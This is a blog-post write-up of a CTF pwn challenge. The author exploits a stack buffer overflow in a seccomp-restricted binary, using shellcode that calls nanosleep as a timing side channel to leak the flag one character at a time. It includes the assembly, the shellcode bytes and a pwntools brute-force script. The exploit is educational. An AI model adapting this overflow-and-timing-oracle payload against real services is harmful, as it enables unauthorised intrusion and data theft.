<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Weird chall
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Weird chall" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content=".. .. $$$$ $$$$ aaaaaaaaaaa aaaaaaaaaaa ccKc&#39;:olcccldkKN ccKc&#39;:olcccldkKN cXx&#39;aaaaaaaaaa,lON cXx&#39;aaaaaaaaaa,lON 0caaaaaaaaaaaa&#39;ckN 0caaaaaaaaaaaa&#39;ckN K:aaaaaaaaaa,cxKN K:aaaaaaaaaa,cxKN aaaaaaaaa&#39;oKXKO aaaaaaaaa&#39;oaaa &#39;&#39;Od,;c:&#39;aa aaaaaaa ,co:,lxl;x&#39;&#39; NN0l&#39;aaaaa,:loddddddlc;&#39;aaaaa&#39;dX 0l&#39;aaa&#39;cdOXN K0XN NKko;aaaa;xX Xd,aaa,o0N Ndcx0 Xkcaaaa:O XlaaaalK Xc,ck Nk;aaa,kN Xoaaa,xN Xc&#39;;x Kcaaa,O Nx&#39;aa&#39;xN Xc&#39;:k Kcaaa:K KcaaalX No;lO O,aaaxN O,aa&#39;x Kl;ckNNNNNNN XcaaalX k&#39;aa&#39;k Ndaaa;xkxdxxOKN XlaaacX O,aa&#39;x KxdxOXNNNNNN XcaaalX KcaaalX O,aaax Nx&#39;aa&#39;xN Kcaaa:0 Xoaaa,xN Klaaa,O Xlaaa&#39;oK NO:aaa,kN Xd,aaa,dKN XOc&#39;aaa:ON N0l&#39;aaa&#39;cxOXN NKko;aaaa,dX NOcaaaaaa,:lodxxxddoc;&#39;aaaaa&#39;oK Kcaaa&#39;&#39;aaaaaaaaaaaaaaaa&#39;aaaadX Nx&#39;aa:OKkdolc::::::cldxOKk,aa;O XOddK NOdx0N" />
<meta property="og:description" content=".. .. $$$$ $$$$ aaaaaaaaaaa aaaaaaaaaaa ccKc&#39;:olcccldkKN ccKc&#39;:olcccldkKN cXx&#39;aaaaaaaaaa,lON cXx&#39;aaaaaaaaaa,lON 0caaaaaaaaaaaa&#39;ckN 0caaaaaaaaaaaa&#39;ckN K:aaaaaaaaaa,cxKN K:aaaaaaaaaa,cxKN aaaaaaaaa&#39;oKXKO aaaaaaaaa&#39;oaaa &#39;&#39;Od,;c:&#39;aa aaaaaaa ,co:,lxl;x&#39;&#39; NN0l&#39;aaaaa,:loddddddlc;&#39;aaaaa&#39;dX 0l&#39;aaa&#39;cdOXN K0XN NKko;aaaa;xX Xd,aaa,o0N Ndcx0 Xkcaaaa:O XlaaaalK Xc,ck Nk;aaa,kN Xoaaa,xN Xc&#39;;x Kcaaa,O Nx&#39;aa&#39;xN Xc&#39;:k Kcaaa:K KcaaalX No;lO O,aaaxN O,aa&#39;x Kl;ckNNNNNNN XcaaalX k&#39;aa&#39;k Ndaaa;xkxdxxOKN XlaaacX O,aa&#39;x KxdxOXNNNNNN XcaaalX KcaaalX O,aaax Nx&#39;aa&#39;xN Kcaaa:0 Xoaaa,xN Klaaa,O Xlaaa&#39;oK NO:aaa,kN Xd,aaa,dKN XOc&#39;aaa:ON N0l&#39;aaa&#39;cxOXN NKko;aaaa,dX NOcaaaaaa,:lodxxxddoc;&#39;aaaaa&#39;oK Kcaaa&#39;&#39;aaaaaaaaaaaaaaaa&#39;aaaadX Nx&#39;aa:OKkdolc::::::cldxOKk,aa;O XOddK NOdx0N" />
<link rel="canonical" href="http://0.0.0.0:4000/2020/11/30/weird-chall.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2020/11/30/weird-chall.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-11-30T00:00:00+01:00" />
<script type="application/ld+json">
{"headline":"Weird chall","url":"http://0.0.0.0:4000/2020/11/30/weird-chall.html","datePublished":"2020-11-30T00:00:00+01:00","dateModified":"2020-11-30T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2020/11/30/weird-chall.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":".. .. $$$$ $$$$ aaaaaaaaaaa aaaaaaaaaaa ccKc&#39;:olcccldkKN ccKc&#39;:olcccldkKN cXx&#39;aaaaaaaaaa,lON cXx&#39;aaaaaaaaaa,lON 0caaaaaaaaaaaa&#39;ckN 0caaaaaaaaaaaa&#39;ckN K:aaaaaaaaaa,cxKN K:aaaaaaaaaa,cxKN aaaaaaaaa&#39;oKXKO aaaaaaaaa&#39;oaaa &#39;&#39;Od,;c:&#39;aa aaaaaaa ,co:,lxl;x&#39;&#39; NN0l&#39;aaaaa,:loddddddlc;&#39;aaaaa&#39;dX 0l&#39;aaa&#39;cdOXN K0XN NKko;aaaa;xX Xd,aaa,o0N Ndcx0 Xkcaaaa:O XlaaaalK Xc,ck Nk;aaa,kN Xoaaa,xN Xc&#39;;x Kcaaa,O Nx&#39;aa&#39;xN Xc&#39;:k Kcaaa:K KcaaalX No;lO O,aaaxN O,aa&#39;x Kl;ckNNNNNNN XcaaalX k&#39;aa&#39;k Ndaaa;xkxdxxOKN XlaaacX O,aa&#39;x KxdxOXNNNNNN XcaaalX KcaaalX O,aaax Nx&#39;aa&#39;xN Kcaaa:0 Xoaaa,xN Klaaa,O Xlaaa&#39;oK NO:aaa,kN Xd,aaa,dKN XOc&#39;aaa:ON N0l&#39;aaa&#39;cxOXN NKko;aaaa,dX NOcaaaaaa,:lodxxxddoc;&#39;aaaaa&#39;oK Kcaaa&#39;&#39;aaaaaaaaaaaaaaaa&#39;aaaadX Nx&#39;aa:OKkdolc::::::cldxOKk,aa;O XOddK NOdx0N","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.6rem; text-align: center"> 
                                   ..                         ..                                    
                                  $$$$                       $$$$                                   
                              aaaaaaaaaaa                aaaaaaaaaaa                                
                            ccKc':olcccldkKN           ccKc':olcccldkKN                             
                           cXx'aaaaaaaaaa,lON         cXx'aaaaaaaaaa,lON                            
                           0caaaaaaaaaaaa'ckN         0caaaaaaaaaaaa'ckN                            
                           K:aaaaaaaaaa,cxKN           K:aaaaaaaaaa,cxKN                            
                            aaaaaaaaa'oKXKO             aaaaaaaaa'oaaa                              
                               ''Od,;c:'aa    aaaaaaa  ,co:,lxl;x''                                 
                                 NN0l'aaaaa,:loddddddlc;'aaaaa'dX                                   
                                0l'aaa'cdOXN   K0XN   NKko;aaaa;xX                                  
                               Xd,aaa,o0N      Ndcx0       Xkcaaaa:O                                
                              XlaaaalK         Xc,ck         Nk;aaa,kN                              
                             Xoaaa,xN          Xc';x           Kcaaa,O                              
                            Nx'aa'xN           Xc':k            Kcaaa:K                             
                            KcaaalX            No;lO             O,aaaxN                            
                            O,aa'x             Kl;ckNNNNNNN      XcaaalX                            
                            k'aa'k            Ndaaa;xkxdxxOKN    XlaaacX                            
                            O,aa'x             KxdxOXNNNNNN      XcaaalX                            
                            KcaaalX                              O,aaax                             
                            Nx'aa'xN                            Kcaaa:0                             
                             Xoaaa,xN                          Klaaa,O                              
                              Xlaaa'oK                       NO:aaa,kN                              
                               Xd,aaa,dKN                  XOc'aaa:ON                               
                                N0l'aaa'cxOXN          NKko;aaaa,dX                                 
                                  NOcaaaaaa,:lodxxxddoc;'aaaaa'oK                                   
                                   Kcaaa''aaaaaaaaaaaaaaaa'aaaadX                                   
                                  Nx'aa:OKkdolc::::::cldxOKk,aa;O                                   
                                   XOddK                 NOdx0N                                     
</pre>

<hr />

<p>This was a pwn challenge finally rated with 428 points in DEKRA CTF.
They just give you a binary called challenge.</p>

<p>The instructions said:</p>

<blockquote>
  <p>This is a slightly different challenge.</p>
</blockquote>

<hr />

<h2 id="first-run">First run</h2>

<p>When we first run the binary we get:</p>

<blockquote>
  <p>-<em>__</em>-</p>
</blockquote>

<p>Okey, weird. We can try some arguments but same response always.</p>

<p>Time to fire up Cutter!</p>

<h2 id="first-look">First look</h2>

<p>When we open it with Cutter we get the following information:</p>

<p><img src="/./assets/imgs/weird-dashboard.png" alt="" /></p>

<p>Almost everything disabled and not stripped so let’s search for the main function.</p>

<p><img src="/./assets/imgs/weird-main.png" alt="" /></p>

<p>Looking at the first block we can see why that face was displayed. It’s trying to open <strong>flag.txt</strong> and if the open isn’t successful, print something (the face) and exit.</p>

<p>We can create a flag.txt file where we are executing the binary to avoid that exit so let’s do that and run it again:</p>

<blockquote>
  <p>Exploit me (it is an easy bof)… the flag is @ 0x7ffc3e892e60…</p>
</blockquote>

<p>Nice, now we get a different result. Let’s proceed with the big function:</p>

<p><img src="/./assets/imgs/weird-big1.png" alt="" /></p>

<p>First, we have a <strong>fgets</strong> that reads from the flag.txt opened from before.</p>

<p>We discovered something important here: <strong>the contents of the flag.txt are loaded into the program’s memory.</strong></p>

<p>Then it prints that string we saw before and, as it states, the address where that previous fgets put the contents of flag.txt</p>

<p>After that, a ton of seccomp rules.</p>

<p><img src="/./assets/imgs/weird-longmain.png" alt="" /></p>

<blockquote>
  <p>I actually looked for each of the syscalls during the competition but when reading about seccomp I found this amazing tool called <a href="https://github.com/david942j/seccomp-tools">seccomp-tools</a> that makes the work of analyzing seccomp rules so easy</p>
</blockquote>

<p>We execute seccomp-tools against the binary and we get:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Exploit me <span class="o">(</span>it is an easy bof<span class="o">)</span>... the flag is @ 0x7ffcb9cc44b0...
 line  CODE  JT   JF      K
<span class="o">=================================</span>
 0000: 0x20 0x00 0x00 0x00000004  A <span class="o">=</span> <span class="nb">arch
 </span>0001: 0x15 0x00 0x0a 0xc000003e  <span class="k">if</span> <span class="o">(</span>A <span class="o">!=</span> ARCH_X86_64<span class="o">)</span> goto 0012
 0002: 0x20 0x00 0x00 0x00000000  A <span class="o">=</span> sys_number
 0003: 0x35 0x00 0x01 0x40000000  <span class="k">if</span> <span class="o">(</span>A &lt; 0x40000000<span class="o">)</span> goto 0005
 0004: 0x15 0x00 0x07 0xffffffff  <span class="k">if</span> <span class="o">(</span>A <span class="o">!=</span> 0xffffffff<span class="o">)</span> goto 0012
 0005: 0x15 0x05 0x00 0x00000000  <span class="k">if</span> <span class="o">(</span>A <span class="o">==</span> <span class="nb">read</span><span class="o">)</span> goto 0011
 0006: 0x15 0x04 0x00 0x00000005  <span class="k">if</span> <span class="o">(</span>A <span class="o">==</span> fstat<span class="o">)</span> goto 0011
 0007: 0x15 0x03 0x00 0x00000008  <span class="k">if</span> <span class="o">(</span>A <span class="o">==</span> lseek<span class="o">)</span> goto 0011
 0008: 0x15 0x02 0x00 0x00000023  <span class="k">if</span> <span class="o">(</span>A <span class="o">==</span> nanosleep<span class="o">)</span> goto 0011
 0009: 0x15 0x01 0x00 0x0000003c  <span class="k">if</span> <span class="o">(</span>A <span class="o">==</span> <span class="nb">exit</span><span class="o">)</span> goto 0011
 0010: 0x15 0x00 0x01 0x000000e7  <span class="k">if</span> <span class="o">(</span>A <span class="o">!=</span> exit_group<span class="o">)</span> goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  <span class="k">return </span>ALLOW
 0012: 0x06 0x00 0x00 0x00000000  <span class="k">return </span>KILL
</code></pre></div></div>

<p>So it looks like we can only execute the following syscalls:</p>

<ul>
  <li>read</li>
  <li>fstat</li>
  <li>lseek</li>
  <li>nanosleep</li>
  <li>exit</li>
  <li>exit_group</li>
</ul>

<hr />

<p>Last part, a simple <strong>scanf</strong>:</p>

<p><img src="/./assets/imgs/weird-finalmain.png" alt="" /></p>

<p>It doesn’t have limitations so <strong>we can write as many bytes as we want</strong>. Checking <code class="language-plaintext highlighter-rouge">var_40h</code>, we can see it is at <code class="language-plaintext highlighter-rouge">rbp - 0x40</code> so after writing 0x40 bytes we can make a buffer overflow.</p>

<hr />

<p>We can also see that a jumper function exists with this simple code:</p>

<p><img src="/./assets/imgs/weird-jumper.png" alt="" /></p>

<p>This is obviously for us to redirect the execution to the stack.</p>

<h2 id="what-now">What now?</h2>

<p>We know we have the contents of the flag loaded into the memory so we can just print the string and we are done. Easy challenge, right? Well, not that easy. Do you remember that seccomp part? We can’t execute any syscall different from the ones from before. That means we can’t write anything to stdout.</p>

<p>I actually spent a couple of hours until I had an idea. I remember a trick from blind SQL injections where you use some sort of delay to check if the SQL was executed. If the browser takes x time to respond, the SQL was valid. If not, the answer comes as soon as always.</p>

<p>As we can see, we have access to the nanosleep call so we can stop the execution as much as we want.</p>

<h2 id="the-exploit">The exploit</h2>

<p>The exploit consists of redirecting the execution to the stack and then execute some assembly to check whether each of the chars in the flag string matches one we are sending. If they match, halt the execution for 5 seconds, for example.</p>

<p>First, let’s write the assembly.</p>

<p>We have to load one byte from the address and then compare it with one character we send. If it doesn’t match, exit the program. Let’s write that first.</p>

<blockquote>
  <p>When debugging the code, I noticed that the register r13 contained the address of the flag so no need to actually use the one displayed when executed</p>
</blockquote>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>movzx  eax,BYTE PTR [r13 + n]
cmp    al, my_char
jne    0x40120b
</code></pre></div></div>

<blockquote>
  <p>That address is the one of the <code class="language-plaintext highlighter-rouge">mov edi, 0</code> in the main function that it’s followed by the <code class="language-plaintext highlighter-rouge">call exit</code>.</p>
</blockquote>

<p>In our code, we will increase the <strong>n</strong> so we access the first item, the second, etc. in the flag and <strong>my_char</strong> for each of the printable characters.</p>

<p>Then, what if they are the same? Call nanosleep. I’m not really used to write assembly and I’ve never used that syscall. By googling ‘nanosleep syscall x64’ I found that it receives 2 structs so I thought about reading how others used that.</p>

<p>I found <a href="https://packetstormsecurity.com/files/142410/Linux-x86-64-Reverse-Shell-Shellcode.html">this script</a> that uses nanosleep so I used that part for my assembly.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor    rsi,rsi
push   rsi
push   0x3
push   rsp
pop    rdi
push   0x23
pop    rax
syscall
jmp    0x40120b
</code></pre></div></div>

<p>When testing it, it worked partially. I got <code class="language-plaintext highlighter-rouge">DEKRA{4ss</code> and after some time <code class="language-plaintext highlighter-rouge">!}</code>. Something wasn’t working.</p>

<p>Well, remember the program reads using scanf? Scanf cuts the input if it founds a <strong>whitespace</strong></p>

<blockquote>
  <p>%s. String of characters. This will read subsequent characters until a whitespace is found (whitespace characters are considered to be blank, newline and tab).</p>
</blockquote>

<p>Can you spot it? It stopped working on the 10th char. That’s \n, new line. So, my solution was to increment the starting address by something so we can dump more chars, for example, 5.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add r13, 0x5
</code></pre></div></div>

<p>All done! Let’s crack it.</p>

<h2 id="pwn-all-the-things">Pwn all the things</h2>

<p>Let’s assume that the flag is going to be 10 bytes long. If it isn’t, there is no problem because this is just a start point.</p>

<p>Now, printable characters. They go from <strong>!</strong> (32) to <strong>~</strong> (126) so that’s what we are trying.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="n">time</span>
<span class="kn">import</span> <span class="n">sys</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="mi">127</span><span class="p">):</span>
        <span class="c1">#p = process('./challenge')
</span>        <span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">'</span><span class="s">remote_ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">remote_port</span><span class="p">)</span>
        <span class="c1"># gdb.attach(p.pid, '''
</span>        <span class="c1"># b *main+552
</span>        <span class="c1"># c
</span>        <span class="c1"># ''')
</span>        <span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
</code></pre></div></div>

<p>I’m going to use the famous <a href="https://defuse.ca/online-x86-assembler.htm">defuse.ca</a> to generate the bytes from the assembly</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>        <span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x49\x83\xC5\x05</span><span class="sh">"</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x41\x0f\xb6\x45</span><span class="sh">"</span><span class="o">+</span> <span class="nf">chr</span><span class="p">(</span><span class="n">i</span><span class="p">).</span><span class="nf">encode</span><span class="p">()</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x3c</span><span class="sh">"</span> <span class="o">+</span> <span class="nf">chr</span><span class="p">(</span><span class="n">j</span><span class="p">).</span><span class="nf">encode</span><span class="p">()</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x0f\x85\xf6\x11\x40\x00\x48\x31\xf6\x56\x6a\x03\x54\x5f\x6a\x23\x58\x0f\x05\xe9\xe4\x11\x40\x00</span><span class="sh">"</span>

        <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x48</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x4011c4</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcode</span>

        <span class="n">start_time</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span>
        <span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
        <span class="n">p</span><span class="p">.</span><span class="nf">recvall</span><span class="p">()</span>
        <span class="n">aprox</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">start_time</span>

        <span class="k">if</span> <span class="n">aprox</span> <span class="o">&gt;</span> <span class="mi">2</span><span class="p">:</span>
            <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">success</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">a+</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
                <span class="nb">file</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="nf">chr</span><span class="p">(</span><span class="n">j</span><span class="p">))</span>
                <span class="k">if</span> <span class="nf">chr</span><span class="p">(</span><span class="n">j</span><span class="p">)</span> <span class="o">==</span> <span class="sh">'</span><span class="s">}</span><span class="sh">'</span><span class="p">:</span>
                    <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span>
                <span class="k">break</span>
</code></pre></div></div>

<p>After some time, the program started to hang on some characters and they were written to the file. Finally, I got:</p>

<blockquote>
  <p>{4ss3mbLY</p>
</blockquote>

<p>If we add 5 more bytes to the r13 register, we get:</p>

<blockquote>
  <p>mbLY!}</p>
</blockquote>

<p>Knowing that the flag started with DEKRA give us the final flag:</p>

<blockquote>
  <p>DEKRA{4ss3mbLY!}</p>
</blockquote>

<p>Pwned!</p>

<hr />

<p><em>I know that assembly can be upgraded and that there are ways to dump the flag just in 1 execution but I explain here my thinking process. It’s not, by far, a final good solution but that’s not the purpose of these writeups. I just try to explain the process of how I manage to get the solution</em></p>


        </div>
    </main>

    
    </body>
</html>